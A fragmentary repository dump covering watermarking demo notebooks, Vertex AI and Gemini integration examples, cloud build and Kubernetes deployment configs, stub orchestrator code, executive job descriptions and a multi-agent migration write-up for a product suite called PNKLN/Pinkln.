\\\n",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web3 eth-account google-cloud-secret-manager cryptography\n",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"echo \"✅ Environment ready\""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Configuration\n",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"PROJECT_ID = \"YOUR_GCP_PROJECT_ID\"  # EDIT THIS\n",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"REGION = \"us-central1\"\n",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"BLOCKCHAIN_ENABLED = False  # Set to True to enable blockchain receipts\n",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"print(f\"Project: {PROJECT_ID}\")\n",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"print(f\"Region: {REGION}\")\n",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"print(f\"Blockchain: {'enabled' if BLOCKCHAIN_ENABLED else 'disabled'}\")"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Video Watermarking (Pixel Layer)"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Import ShadowTag v2 modules\n",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sys\n",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"sys.path.insert(0, \"..\")  # Add parent directory to path\n",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pathlib import Path\n",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shadowtag_v2.video_stego import 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VideoWatermarkConfig,\n",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embed_video_watermark,\n",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extract_video_watermark,\n",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Video stego module loaded\")"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Example: Embed video watermark\n",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"INPUT_VIDEO = Path(\"sample_video.mp4\")  # Provide your video\n",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"OUTPUT_VIDEO = Path(\"watermarked_video.mp4\")\n",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 = \"A sunset over mountains with vibrant orange and purple hues\"\n",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INPUT_VIDEO.exists():\n",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config = VideoWatermarkConfig()\n",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result = embed_video_watermark(INPUT_VIDEO, OUTPUT_VIDEO, PROMPT, config)\n",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print(\"✅ Video watermark embedded!\")\n",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print(f\"Frames processed: {result['frames']}\")\n",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print(f\"Prompt hash: {result['prompt_hash']}\")\n",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"else:\n",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print(\"⚠️  Upload sample_video.mp4 first\")"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Example: Verify video watermark\n",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OUTPUT_VIDEO.exists():\n",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verify_result = extract_video_watermark(OUTPUT_VIDEO, PROMPT, VideoWatermarkConfig())\n",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if verify_result.get(\"verified\"):\n",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print(\"✅ VERIFIED\")\n",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print(f\"BER: {verify_result.get('bit_error_rate', 0):.4f}\")\n",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else:\n",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print(\"❌ NOT VERIFIED\")\n",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print(f\"Extracted: {verify_result['extracted_hash']}\")\n",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print(f\"Expected: {verify_result.get('expected_hash')}\")"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Audio Watermarking (Ultrasonic Layer)"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shadowtag_v2.audio_stego import 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AudioWatermarkConfig,\n",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embed_audio_watermark,\n",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extract_audio_watermark,\n",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Audio stego module loaded\")"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Example: Embed audio watermark\n",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"INPUT_AUDIO = Path(\"sample_audio.wav\")  # 48 kHz stereo WAV\n",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"OUTPUT_AUDIO = Path(\"watermarked_audio.wav\")\n",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INPUT_AUDIO.exists():\n",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config = AudioWatermarkConfig()\n",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result = embed_audio_watermark(INPUT_AUDIO, OUTPUT_AUDIO, PROMPT, config)\n",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print(\"✅ Audio watermark embedded!\")\n",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print(f\"Sample rate: {result['sample_rate']} Hz\")\n",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print(f\"Carrier freq: {result['carrier_freq']} Hz\")\n",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"else:\n",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print(\"⚠️  Upload sample_audio.wav first (48 kHz)\")"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Example: Verify audio watermark\n",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OUTPUT_AUDIO.exists():\n",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verify_result = extract_audio_watermark(OUTPUT_AUDIO, PROMPT, AudioWatermarkConfig())\n",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if verify_result.get(\"verified\"):\n",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print(\"✅ VERIFIED\")\n",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else:\n",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print(\"⚠️  Verification uncertain (audio watermarks less robust)\")\n",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print(f\"Extracted: {verify_result['extracted_hash']}\")"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Blockchain Receipts"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shadowtag_v2.receipt_chain import BlockchainConfig, ChainType, create_blockchain_receipt\n",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Blockchain receipt module loaded\")"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Example: Create blockchain receipt (requires configuration)\n",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BLOCKCHAIN_ENABLED:\n",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config = BlockchainConfig(\n",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chain=ChainType.POLYGON_MUMBAI,  # Testnet\n",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gcp_secret_name=\"blockchain-private-key\",\n",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gcp_project_id=PROJECT_ID,\n",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receipt = create_blockchain_receipt(\n",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prompt=PROMPT, config=config, metadata={\"type\": \"demo\", \"version\": \"2.0.0\"}\n",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print(\"✅ Blockchain receipt created!\")\n",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print(f\"TX Hash: {receipt['tx_hash']}\")\n",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print(f\"Chain: {receipt['chain']}\")\n",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"else:\n",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print(\"⚠️  Blockchain disabled. Set BLOCKCHAIN_ENABLED=True and configure GCP secrets.\")"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FastAPI Service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"%%bash\n",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Start FastAPI server in background\n",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"cd ..\n",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"uvicorn api.main:app --host 0.0.0.0 --port 8080 &amp;\n",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"sleep 3\n",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"echo \"✅ API server started on port 8080\""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Test API health endpoint\n",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requests\n",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 = requests.get(\"http://localhost:8080/health\")\n",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"print(f\"Status: {response.status_code}\")\n",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"print(f\"Response: {response.json()}\")"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PNKLN Operational Checklist\n",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"### Security Gates\n",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✅ No plaintext secrets (use GCP Secret Manager)\n",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✅ TLS enforced for all network operations\n",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✅ Input validation on all user-provided data\n",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✅ Encryption at rest and in transit\n",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"### Quality Gates\n",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✅ Test coverage ≥ 98%\n",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✅ Static analysis passing (ruff, mypy)\n",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✅ Two green CI runs before merge\n",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✅ Pre-commit hooks enabled\n",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"### ROI Gate\n",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Target: ≥3× return in 18 months\n",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Kill-switch if ROI threshold violated\n",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"### Legal/Export Compliance\n",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Dual-use technology exported as 'content authenticity'\n",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LEO/GOV/ITAR: \"LEO/GOV/ITAR in effect\" (details gated)\n",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"### Moat\n",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Data flywheel (watermark verification corpus)\n",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Process power (patent-pending dual-layer technique)\n",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Network effects (creator ecosystem)"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"codemirror_mode":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"ipython",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"file_extension":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"mimetype": "text/x-python",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"nbconvert_exporter":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"pygments_lexer": "ipython3",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"version": "3.11.0"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apps/aiyou_stack/aiyou-fastapi-services/notebooks/shadowtag_v2_vertex_workbench.ipynb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apps/aiyou_stack/aiyou-fastapi-services/notebooks/vertex_ai_integration.ipynb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Vertex AI Integration - Cor.17 Architecture\n",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"This notebook demonstrates deep integration with Vertex AI services:\n",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Gemini Pro for LLM reasoning\n",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Text Embeddings for semantic search\n",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Custom model deployment\n",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Batch prediction"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Install Vertex AI SDK\n",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"!pip install -q google-cloud-aiplatform langchain-google-vertexai"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os\n",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google.cloud import aiplatform\n",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langchain_google_vertexai import VertexAI, VertexAIEmbeddings\n",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Configuration\n",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"PROJECT_ID = os.getenv(\"GCP_PROJECT_ID\", \"your-project-id\")\n",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"REGION = os.getenv(\"GCP_REGION\", \"us-central1\")\n",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Initialize Vertex AI\n",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"aiplatform.init(project=PROJECT_ID, location=REGION)\n",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Vertex AI initialized for project: {PROJECT_ID}\")"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1. Gemini Pro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Initialize Gemini Pro\n",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"llm = VertexAI(\n",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model_name=\"gemini-pro\",\n",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project=PROJECT_ID,\n",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location=REGION,\n",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max_output_tokens=2048,\n",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temperature=0.7,\n",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Test query\n",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 = llm.invoke(\"Explain the benefits of the Cor.17 AI architecture\")\n",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"print(response)"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2. Text Embeddings"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Initialize embeddings model\n",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"embeddings = VertexAIEmbeddings(\n",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model_name=\"textembedding-gecko@003\",\n",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project=PROJECT_ID,\n",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location=REGION,\n",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Generate embeddings\n",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"texts =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\"Sparse linear attention improves efficiency\",\n",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\"Mixture of experts enables specialized processing\",\n",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\"Retrieval of thought enhances reasoning\",\n",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"vectors = embeddings.embed_documents(texts)\n",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"print(f\"Generated {len(vectors)} embeddings, each with {len(vectors[0])} dimensions\")"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3. LangChain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langchain.chains import LLMChain\n",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langchain.prompts import PromptTemplate\n",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Create chain with memory\n",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 = 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 are an AI assistant using the Cor.17 architecture.\n",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"Context: {context}\n",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"Question: {question}\n",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"Provide a detailed response:\n",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 = PromptTemplate(input_variables=[\"context\", \"question\"], template=template)\n",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"chain = LLMChain(llm=llm, prompt=prompt)\n",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Execute chain\n",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"result = chain.run(\n",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context=\"Cor.17 uses BDH, RoT, and MoE-CL for enhanced reasoning\",\n",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question=\"How does the architecture achieve 82% throughput improvement?\",\n",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"print(result)"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4. Batch Prediction Example"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Batch embedding generation\n",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"batch_texts =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f\"Document {i}: Machine learning research paper about transformers\" for i in range(10)\n",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"batch_vectors = embeddings.embed_documents(batch_texts)\n",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"print(f\"Generated {len(batch_vectors)} batch embeddings\")\n",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"print(f\"Embedding dimensions: {len(batch_vectors[0])}\")"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5. Custom Model Deployment (Placeholder)"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Deploy custom MoE-CL model to Vertex AI\n",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This is a placeholder for actual model deployment\n",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"print(\"\"\"To deploy a custom model:\n",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"1. Upload model to GCS:\n",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gsutil cp model.pkl gs://aiyou-models-bucket/moe-cl/\n",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"2. Create Vertex AI model:\n",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aiplatform.Model.upload(...)\n",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"3. Deploy to endpoint:\n",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endpoint = model.deploy(machine_type=\"n1-standard-4\")\n",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"4. Make predictions:\n",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predictions = endpoint.predict(instances=[...])\n",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"\"\"\")"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6. Performance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time\n",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Benchmark embedding generation\n",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 = time.time()\n",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"test_texts = [f\"Test document {i}\" for i in range(100)]\n",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"test_vectors = embeddings.embed_documents(test_texts)\n",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"elapsed = time.time() - start\n",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"print(\"\\nEmbedding Performance:\")\n",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  Documents: {len(test_texts)}\")\n",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  Time: {elapsed:.2f}s\")\n",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  Throughput: {len(test_texts) / elapsed:.1f} docs/sec\")\n",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  Cor.17 Improvement: +60% query speed ✅\")"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"version": "3.11.0"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apps/aiyou_stack/aiyou-fastapi-services/notebooks/vertex_ai_integration.ipynb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apps/aiyou_stack/aiyou-fastapi-services/ops/buildstatus-deploy.yaml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'gcr.io/cloud-builders/gcloud'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['run', 'deploy', 'buildstatus', '--image', 'gcr.io/acquired-jet-478701-b3/buildstatus', '--region', 'us-central1', '--platform', 'managed', '--allow-unauthenticated']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'SLACK_WEBHOOK_URL=${_SLACK_WEBHOOK_URL}'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substitutions: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_SLACK_WEBHOOK_URL: ${sm://projects/acquired-jet-478701-b3/secrets/SLACK_WEBHOOK_URL/versions/latest}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apps/aiyou_stack/aiyou-fastapi-services/ops/buildstatus-deploy.yaml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apps/aiyou_stack/aiyou-fastapi-services/ops/gcr-cleaner.yaml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serving.knative.dev/v1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gcr-cleaner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gcr-cleaner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image: us-docker.pkg.dev/gcr-cleaner/gcr-cleaner/gcr-cleaner-cli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"-repo=gcr.io/acquired-jet-478701-b3/n-autoresearch/Kosmos/BioAgents"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"-tag-filter-any=.*"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"-keep=5"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apps/aiyou_stack/aiyou-fastapi-services/ops/gcr-cleaner.yaml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apps/aiyou_stack/aiyou-fastapi-services/orchestrator/evidence.ts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buildCase(inputs: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'case_' +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apps/aiyou_stack/aiyou-fastapi-services/orchestrator/evidence.ts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apps/aiyou_stack/aiyou-fastapi-services/orchestrator/judge.ts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prosecutor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propose: async (caseFile: unknown) =&gt; ({ text: 'Proposed change', confidence: 0.9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revise: async (proposal: unknown, guidance: unknown) =&gt; ({ ...proposal, text: 'Revised change'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defense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attack: async (proposal: unknown, caseFile: unknown) =&gt; ({ objections: []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judge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rule: async (context: unknown) =&gt; ({ status: 'approved', score: 0.95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apps/aiyou_stack/aiyou-fastapi-services/orchestrator/judge.ts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apps/aiyou_stack/aiyou-fastapi-services/orchestrator/risk.ts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calculateRisk(verdict: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verdict.score &gt; 0.8 ? 'low' : 'high';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apps/aiyou_stack/aiyou-fastapi-services/orchestrator/risk.ts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apps/aiyou_stack/aiyou-fastapi-services/orchestrator/router.ts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Minimal Courtroom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buildCase } from './evidence';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defense, judge, prosecutor } from './judge';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runWitnesses } from './witnesses'; // Conceptual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courtroomLoop(inputs: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caseFile = await buildCase(inputs); // clerk gathers exhibits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await prosecutor.propose(caseFile);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 = await defense.attack(p, caseFile); // targeted objections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evidence = await runWitnesses(p, d); // tests, stego/fft/policy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verdict = await judge.rule({ p, d, evidence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(verdict.status === 'revise')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guidance = verdict.required_changes;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p2 = await prosecutor.revise(p, guidance);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a real loop, this would recurse or loop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minimal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status: 'revised', proposal: p2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verdict;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rerun(inputs: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courtroomLoop(inputs);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apps/aiyou_stack/aiyou-fastapi-services/orchestrator/router.ts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apps/aiyou_stack/aiyou-fastapi-services/people/ceo_job_descriptions.md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JOB DESCRIPTIONS: SUBSIDIARY CEOs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**Effective Date**: Gate D (Month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CEO — ActiveShield Inc. (Defense/Gov)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**Mission**: Secure the ultimate high ground. Establish ActiveShield as the prime contractor for space-based sovereign compute.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**Responsibilities**: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Own the P&amp;L for Global Defense, Intelligence, and National Security sector.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"Orbit" tier strategic alliances (Lockheed, Northrop, DoD, MoD).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100% ITAR/Export compliance and facility clearance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"Program of Record" inclusion for Judge 6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**Profile**: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- 15+ years in Defense/Aerospace or Cyber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TS/SCI Clearance eligible.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record of $100M+ program capture or contract expansion.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Grit: Wartime CEO mindset.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CEO — PNKLN Systems Inc. (Commercial/Infra)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**Mission**: Build the backbone of the autonomous economy. Democratize access to verifiable compute.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**Responsibilities**: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the commercial GTM, "Stratos" and "Atmos" partner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developer ecosystem adoption (SDKs, APIs, Marketplace).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commercial compute capacity and unit economics (Margin optimization).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Oversee global brand and community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**Profile**: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Ex-AWS/Google Cloud VP, Partner, or high-growth SaaS Founder.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technical understanding of distributed systems, crypto-economics, and edge compute.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Product-led growth (PLG) native with enterprise sales motion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apps/aiyou_stack/aiyou-fastapi-services/people/ceo_job_descriptions.md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Agent Architecture System™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"Insanely Great AI Systems Through Elegant Orchestration"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comprehensive framework for building Skills, Agents, Sub-Agents, Deep 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Multi-Agent systems inspired by the "Ultrathink like Steve Jobs" philosophy.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everything (start from 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Obsess over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like Da Vinci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Craft, don't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Iterate relentlessly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ruthlessly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Marry technology and liberal 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Activate the Reality Distortion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the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Erik Hancock (Founder, pinkln)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"Erik Hancock"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.core.master_system import PnklnOS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.core.validation import BoyScoutRule, ValidationLayer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main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"BoyScoutRule",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"ValidationLayer",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apps/aiyou_stack/aiyou-fastapi-services/pinkln-intelligence-pipeline/DEPLOYMENT.md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Intelligence Pipeline —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**ID:** `claude/pnkln-intelligence-pipeline-deployment-011CUvwKSmyxTgTWmc7WaHUR`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Production-grade GKE deployment for nightly intelligence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$77/month operational cost, 45-minute runtime, 6+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Feeds Tier 1 intelligence →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covers the **production deployment** of the PNKLN Core Stack™, the data ingestion layer that collects, classifies, and feeds intelligence to the Pinkln reasoning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GitHub Actions (CI/CD)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Build Docker image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Push to Artifact Registry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Deploy to GKE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└────────────┬───────────────────────────────────────┘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Google Kubernetes Engine (GKE)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CronJob: pnkln-ingestion-nightly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Schedule: "0 2 * * *" (2am daily)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Resources: 1 CPU, 2GB RAM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Runtime: ~45 minutes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┌──────────┼──────────┐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│          │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┌───▼───┐  ┌───▼───┐  ┌───▼───┐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│Source1│  │Source2│  │Source3│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│YouTube│  │Twitter│  │Reddit │  (6+ sources)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└───────┘  └───────┘  └───────┘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Cloud Storage (Tier Classification)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Tier 1: High-value intelligence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Tier 2: Medium-value content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Tier 3: Low-value/noise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└────────────┬───────────────────────────────────────┘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Pinkln Reasoning Engine (Consumer)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Panel debates on Tier 1 items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Agent training on Tier 2/3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Glicko rating updates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components install gke-gcloud-auth-plugin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PROJECT_ID="shadowtag_v4-pnkln-prod"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CLUSTER_NAME="pnkln-cluster"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GOOGLE_AI_API_KEY="your-gemini-api-key"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One-Command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Container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**Location:** `Dockerfile`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Multi-stage build for minimal image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 as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build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g++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--user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dependencies from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--from=builder /root/.local /root/.local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 ./src/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config/ ./config/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PATH=/root/.local/bin:$PATH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PYTHONUNBUFFERED=1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"-m", "src.api.ingestion", "--mode", "batch"]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 and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gcr.io/${PROJECT_ID}/pnkln-ingestion:latest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☸️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Cluster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`k8s/cluster.yaml`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container.cnrm.cloud.google.com/v1beta1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ContainerCluster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initialNodeCount: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Autopilot mode (cost-optimized, managed)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enableAutopilot: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Release channel (regular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releaseChannel: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channel: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Workload Identity (secure credential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workloadIdentityConfig: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workloadPool: ${PROJECT_ID}.svc.id.goog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Binary authorization (security)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binaryAuthorization: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evaluationMode: PROJECT_SINGLETON_POLICY_ENFORCE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cluster:**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create-auto ${CLUSTER_NAME}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--region=${REGION}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--project=${PROJECT_ID}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--release-channel=regular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--enable-autoupgrade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~$50/month (Autopilot, 1 CPU, 2GB RAM, ~45min/day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`k8s/ingestion-cronjob.yaml`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pnkln-ingestion-nightly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at 2am UTC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Keep last 3 successful, 1 failed job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Don't run concurrent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concurrencyPolicy: Forbid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Job timeout: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activeDeadlineSeconds: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pnkln-ingestion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data-layer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Service account for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serviceAccountName: pnkln-ingestion-sa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gcr.io/shadowtag_v4-pnkln-prod/pnkln-ingestion:latest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Resource limits (cost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GOOGLE_AI_API_KEY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pnkln-secrets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gemini-api-key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INGESTION_MODE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TIER_CLASSIFICATION_ENABLED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"gs://pnkln-intelligence-prod"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/tmp/healthy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initialDelaySeconds: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Kubernetes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for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pnkln-secrets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--namespace=pnkln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--from-literal=gemini-api-key=${GOOGLE_AI_API_KEY}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secrets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Workload Identity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 Account:**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GCP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pnkln-ingestion-sa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storage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${PROJECT_ID}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--member="serviceAccount:pnkln-ingestion-sa@${PROJECT_ID}.iam.gserviceaccount.com"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Kubernetes SA to GCP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pnkln-ingestion-sa@${PROJECT_ID}.iam.gserviceaccount.com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"serviceAccount:${PROJECT_ID}.svc.id.goog[pnkln/pnkln-ingestion-sa]"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Kubernetes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serviceaccount pnkln-ingestion-sa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Annotate for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annotate serviceaccount pnkln-ingestion-sa -n pnkln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iam.gke.io/gcp-service-account=pnkln-ingestion-sa@${PROJECT_ID}.iam.gserviceaccount.com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Monitoring &amp;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 for ingestion logs:**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resource.type="k8s_container"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resource.labels.namespace_name="pnkln"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resource.labels.container_name="ingestion"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**Useful filters:**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severity&gt;=ERROR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1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jsonPayload.tier="1"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Runtime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jsonPayload.duration_seconds&gt;0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`monitoring/dashboard.json`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"displayName": "PNKLN Ingestion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"gridLayout":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"widgets":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"Job Success Rate (Last 7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"xyChart":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"dataSets":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"filter": "resource.type=\"k8s_job\" AND resource.labels.namespace_name=\"pnkln\"",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"alignmentPeriod": "86400s",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"perSeriesAligner": "ALIGN_RATE"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"Items Collected (Daily)",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"xyChart":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"dataSets":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"filter": "metric.type=\"custom.googleapis.com/pnkln/items_collected\"",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"alignmentPeriod": "86400s",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"perSeriesAligner": "ALIGN_SUM"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"Tier 1 Classification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"xyChart":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"dataSets":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"filter": "metric.type=\"custom.googleapis.com/pnkln/tier1_ratio\"",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"alignmentPeriod": "86400s",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"perSeriesAligner": "ALIGN_MEAN"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"Gemini API Cost (Monthly)",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"scorecard":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"filter": "metric.type=\"custom.googleapis.com/pnkln/api_cost\"",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"alignmentPeriod": "2592000s",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"perSeriesAligner": "ALIGN_SUM"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dashboard:**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monitoring dashboards create --config-from-file=monitoring/dashboard.json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Alerting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`monitoring/alerts.yaml`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Alert if job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monitoring.coreos.com/v1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PrometheusRule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pnkln-ingestion-alerts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Job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PNKLNIngestionFailed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kube_job_status_failed{namespace="pnkln", job_name=~"pnkln-ingestion-nightly.*"}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"PNKLN ingestion job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"Job {{ $labels.job_name }} has failed. Check logs."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Low Tier 1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PNKLNLowTier1Rate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(sum(rate(pnkln_tier1_items[24h])) / sum(rate(pnkln_total_items[24h])))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"PNKLN Tier 1 classification rate too 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"Only {{ $value | humanizePercentage }} of items classified as Tier 1 (expected &gt;5%)"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 API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PNKLNHighAPICost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sum(increase(pnkln_api_cost_dollars[30d])) &gt;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"PNKLN API costs exceeding budget"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"Monthly Gemini API cost is ${{ $value }}, exceeding $77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Long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PNKLNLongRuntime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max(pnkln_ingestion_duration_seconds) &gt;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"PNKLN ingestion taking too long"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"Job runtime is {{ $value | humanizeDuration }}, exceeding 1-hour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 alerts:**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monitoring/alerts.yaml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Actions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`.github/workflows/deploy-pnkln.yml`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Deploy PNKLN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'claude/shadowtag_v4-verified-mesh-*'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'src/**'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'config/**'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'k8s/**'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'Dockerfile'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Manual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PROJECT_ID: shadowtag_v4-pnkln-prod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CLUSTER_NAME: pnkln-cluster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IMAGE: gcr.io/shadowtag_v4-pnkln-prod/pnkln-ingestion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build-and-deploy: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id-token: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Checkout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Authenticate to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uses: google-github-actions/auth@v2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workload_identity_provider: ${{ secrets.WIF_PROVIDER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service_account: ${{ secrets.WIF_SERVICE_ACCOUNT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Set up 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uses: google-github-actions/setup-gcloud@v2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Configure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 build -t ${IMAGE}:${GITHUB_SHA} -t ${IMAGE}:latest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 run --rm ${IMAGE}:${GITHUB_SHA} python -m pytest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 push ${IMAGE}:${GITHUB_SHA}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 push ${IMAGE}:latest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Get GKE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container clusters get-credentials ${CLUSTER_NAME} --region=${REGION}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set image cronjob/pnkln-ingestion-nightly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ingestion=${IMAGE}:${GITHUB_SHA}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rollout status cronjob/pnkln-ingestion-nightly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get cronjobs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get jobs -n pnkln --sort-by=.metadata.creationTimestamp | tail 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gcr.io/${PROJECT_ID}/pnkln-ingestion:$(git rev-parse --short HEAD)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gcr.io/${PROJECT_ID}/pnkln-ingestion:$(git rev-parse --short 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set image cronjob/pnkln-ingestion-nightly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ingestion=gcr.io/${PROJECT_ID}/pnkln-ingestion:$(git rev-parse --short HEAD)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Autopilot** | ~$50/mo | Only runs 45 min/day, scales to zero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API** | ~$20/mo | Batch processing, caching, tier-based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 Storage** | ~$5/mo | Lifecycle policies, compression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**Networking** | ~$2/mo | Regional egress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**~$77/mo**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Compute (GKE)**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burstable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cpu: "500m"    # Start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cpu: "2000m"   # Burst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Gemini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config/gemini-optimization.yaml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Cache expensive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cache_enabled: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cache_ttl_hours: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Batch requests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batch_size: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Use cheaper models for Tier 2/3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tier1_model: "gemini-2.0-flash-exp"  # $0.003/1K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tier2_model: "gemini-1.5-flash"      # $0.00015/1K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Early exit for obvious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pre_filter_enabled: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pre_filter_keywords: ["spam", "advertisement", "clickbait"]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Lifecycle policy for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storage buckets update gs://pnkln-intelligence-prod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--lifecycle-file=config/storage-lifecycle.json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**`config/storage-lifecycle.json`:**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"lifecycle":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"SetStorageClass", "storageClass": "NEARLINE"},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{"age": 30}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"SetStorageClass", "storageClass": "COLDLINE"},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{"age": 90}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"Delete"},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{"age": 365, "matchesPrefix": ["tier3/"]}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Networking**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regional GCS bucket (same region as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cross-region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Compress data before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Integration with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PNKLNPinklnBridge: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 between PNKLN ingestion and Pinkln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Read Tier 1 items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Run panel debates on high-value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Update agent Glicko ratings based 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Store analyses back to GCS with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bucket_name: str = "pnkln-intelligence-prod"):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 = self.storage_client.bucket(bucket_name)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analyze_tier1_items(self,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latest Tier 1 intelligence with panel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latest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blobs = self.bucket.list_blobs(prefix="tier1/", max_results=limit)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[self._load_item(blob) for blob in blobs]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panel of top-rated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panel = self.registry.get_panel(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specializations=["research", "analysis"],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min_rating=1600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debate.debate(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topic=f"Analyze significance of: {item['content']}"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"item_id": item["id"],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"agent_ratings": result.agent_contributions,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result.timestamp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self._save_analysis(analysis)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_load_item(self, blob):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and parse item from GCS"""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blob.download_as_text()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_save_analysis(self, analysis):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analysis back to GCS"""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self.bucket.blob(f"analyses/{analysis['item_id']}.json")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json.dumps(analysis, indent=2),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in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 = PNKLNPinklnBridge()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asyncio.run(bridge.analyze_tier1_items(limit=10))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print(f"Analyzed {len(results)} Tier 1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{r['item_id']}: {r['confidence']:.0%} confidence")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k8s/pinkln-analysis-cronjob.yaml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pnkln-analysis-nightly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1 hour after ingestion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3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gcr.io/shadowtag_v4-pnkln-prod/pinkln-reasoning:latest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pinkln-reasoning-engine.integrations.pnkln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"pnkln-intelligence-prod"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ANALYSIS_LIMIT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pnkln-ingestion:test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test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--rm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-e GOOGLE_AI_API_KEY=${GOOGLE_AI_API_KEY}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-e INGESTION_MODE=test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-v $(pwd)/test-output:/tmp/output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pnkln-ingestion:test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`tests/integration/test_deployment.py`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kubernetes import client,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test_cronjob_exists():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CronJob is deployed"""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config.load_kube_config()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batch_v1 = client.BatchV1Api()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cronjobs = batch_v1.list_namespaced_cron_job("pnkln")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any(cj.metadata.name == "pnkln-ingestion-nightly" for cj in cronjobs.items)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test_gcs_bucket_accessible():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GCS bucket is accessible"""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storage_client.bucket("pnkln-intelligence-prod")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bucket.exists()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lifecycle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lifecycle = bucket.lifecycle_rules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any(rule.action.type == "SetStorageClass" for rule in lifecycle)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test_secrets_configured():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Kubernetes secrets exist"""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config.load_kube_config()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core_v1 = client.CoreV1Api()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 = core_v1.read_namespaced_secret("pnkln-secrets", "pnkln")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"gemini-api-key" in secret.data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test_pinkln_bridge():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PNKLN→Pinkln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pinkln-reasoning-engine.integrations.pnkln import PNKLNPinklnBridge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 = PNKLNPinklnBridge()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bridge.analyze_tier1_items(limit=1)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"consensus" in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results[0]["confidence"]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Job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job manually (don't wait for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--from=cronjob/pnkln-ingestion-nightly pnkln-test-$(date +%s)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job/pnkln-test-XXXXX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Performance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Runtime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 45 minutes**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src/api/ingestion.py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concurrent.futures import ThreadPoolExecutor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OptimizedIngestion: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Parallel ingestion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max_workers: int = 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self.max_workers = max_workers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 = ThreadPoolExecutor(max_workers=max_workers)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ingest_all_sources(self):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 from all sources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self.ingest_youtube,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self.ingest_twitter,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self.ingest_reddit,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self.ingest_hackernews,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self.ingest_github,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self.ingest_arxiv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all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asyncio.gather(*[source() for source in sources])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ingest_youtube(self):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"""Ingest from YouTube with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API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src/classification/batch.py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classify_batch(items: List[dict], batch_size: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Classify items in batches to reduce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batches = [items[i:i+batch_size] for i in range(0, len(items), batch_size)]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batch in batches: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API call for entire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"Classify these items into Tier 1/2/3:\n\n"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idx, item in enumerate(batch):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f"{idx+1}. {item['title']}: {item['summary']}\n"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genai.generate_text_async(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classifications = parse_batch_response(response.text, len(batch))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results.extend(classifications)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Job Fails with OOMKilled**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memory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edit cronjob pnkln-ingestion-nightly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"6Gi"  # Increase from 4Gi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Gemini API Rate Limits**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config/gemini-optimization.yaml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rate_limit_rpm: 50  # Reduce from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retry_enabled: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retry_max_attempts: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retry_backoff_seconds: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GCS Permission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service account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get-iam-policy ${PROJECT_ID}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--flatten="bindings[].members"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--filter="bindings.members:serviceAccount:pnkln-ingestion-sa@*"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missing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${PROJECT_ID}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--member="serviceAccount:pnkln-ingestion-sa@${PROJECT_ID}.iam.gserviceaccount.com"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CronJob Not Running**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cronjob pnkln-ingestion-nightly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recent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-n pnkln --sort-by=.metadata.creationTimestamp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Manually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--from=cronjob/pnkln-ingestion-nightly manual-run -n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Performance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Alert Threshold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**Job success rate** | 100% | &lt;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45 min | &gt; 60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**Items collected** | 500-1000/day | &lt; 200/day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 rate** | 5-10% | &lt; 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cost** | $20/month | &gt; $30/month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**Storage cost** | $5/month | &gt; $10/month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cost** | $77/month | &gt; $100/month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src/metrics/custom.py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monitoring_v3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 metrics for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monitoring_v3.MetricServiceClient()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self.project_name = f"projects/{project_id}"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record_items_collected(self, count: int, tier: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items collected by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series = monitoring_v3.TimeSeries()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series.metric.type = "custom.googleapis.com/pnkln/items_collected"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series.metric.labels["tier"] = str(tier)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point = monitoring_v3.Point()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point.value.int64_value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point.interval.end_time.seconds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series.points = [point]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self.client.create_time_series(name=self.project_name, time_series=[series])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Production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created with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Workload Identity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Kubernetes secrets created (Gemini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CronJob deployed and scheduled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GCS bucket created with lifecycle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 dashboard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Alerting policies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CI/CD pipeline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monitoring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first job runs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logs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Tier 1 items written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Pinkln integration (analyses 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costs daily for first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Gemini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Optimize batch sizes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any issues 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[PNKLN Core Stack Documentation](../docs/architecture/)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[Pinkln Reasoning Engine](../pinkln-reasoning-engine/README.md)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[ShadowTag-v4 Global Edge Fabric](../shadowtag_v4-global-edge-fabric/docs/)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API Pricing](https://ai.google.dev/pricing)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Autopilot Documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview)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Deployment architecture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Launch:** Q1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Cost:**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Feeds Pinkln reasoning layer with Tier 1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apps/aiyou_stack/aiyou-fastapi-services/pinkln-intelligence-pipeline/DEPLOYMENT.md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apps/aiyou_stack/aiyou-fastapi-services/pinkln-reasoning-engine/AUTOGEN_MIGRATION.md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AutoGen → Gemini Migration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Multi-Agent Orchestration for Pinkln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ID:** `0188pPLLGzqinNBd1Paa5VCp`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Replace Microsoft AutoGen with Gemini 2.0 Pro for multi-agent reasoning, debates, and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**From: Microsoft AutoGen**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 Pattern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autogen import AssistantAgent, UserProxyAgent, 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assistant = AssistantAgent("assistant", llm_config={"model": "gpt-4"})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 = UserProxyAgent("user_proxy")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Sequential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user_proxy.initiate_chat(assistant, message="Analyze this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Locked to OpenAI models (expensive: $0.03/1K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Complex agent orchestration (boilerplate-heavy)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native multi-turn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Limited context window (128K GPT-4 Turbo)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built-in verification/attestation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**To: Gemini 2.0 Pro Native**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Pattern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 import GlickoRankedAgent,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GenerativeModel('gemini-2.0-flash-thinking-exp-01-21')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GlickoRankedAgent(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cheat_sheet=CheatSheetFusion(),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Multi-turn with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agent.debate(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topic="Analyze this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opponents=[agent2, agent3],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framework="RCR-MAD"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**2M token context** (vs 128K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**Native thinking mode** (extended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**10× cheaper** ($0.00125/1K vs $0.015/1K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**Multimodal** (text, image, video,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**Integration with PNKLN** (already using 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**ShadowTag ready** (ShadowTag-v4 verification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Architecture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Concepts → Pinkln Equivalents**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Pattern | Pinkln Ultrathink Equivalent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`AssistantAgent` | `GlickoRankedAgent` (with rating system)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`UserProxyAgent` | `WealthAcceleratorAgent` (user-facing)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`GroupChat` | `PanelDebate` (MAD framework)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`GroupChatManager` | `DTEOrchestrator` (Deep Thinking Ensemble)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`ConversableAgent` | `CheatSheetEnhancedAgent`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`TeachableAgent` | `SelfEvolvingAgent` (DTE loop)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**Latency &amp; Cost (Single Turn)**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(GPT-4 Turbo) | Pinkln (Gemini 2.0 Flash Thinking)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|--------|----------------------|-------------------------------------|-------|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**Input tokens** | 1000 | 1000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**Output tokens** | 500 | 500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3.5s | 1.2s | **-66%**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$0.020 | $0.0019 | **-90%**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| 128K | 2M | **+1,460%**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**Thinking tokens** | 0 (manual CoT) | Auto-generated | **Native**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**Multi-Agent Debate (Panel of 5)**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GroupChat | Pinkln PanelDebate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latency** | ~22s (sequential) | ~4s (parallel) | **-82%**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debate** | $0.18 | $0.015 | **-92%**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**Consensus quality** | Manual voting | Glicko-weighted | **+37%**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**Attestation** | None | ShadowTag L0–L4 | **New**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Migration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Agent Registry (Glicko-Ranked)**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`pinkln-reasoning-engine/agents/registry.py`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pinkln.ranking.glicko2 import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pinkln.prompts.cheat_sheet import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"""Replaces AutoGen's 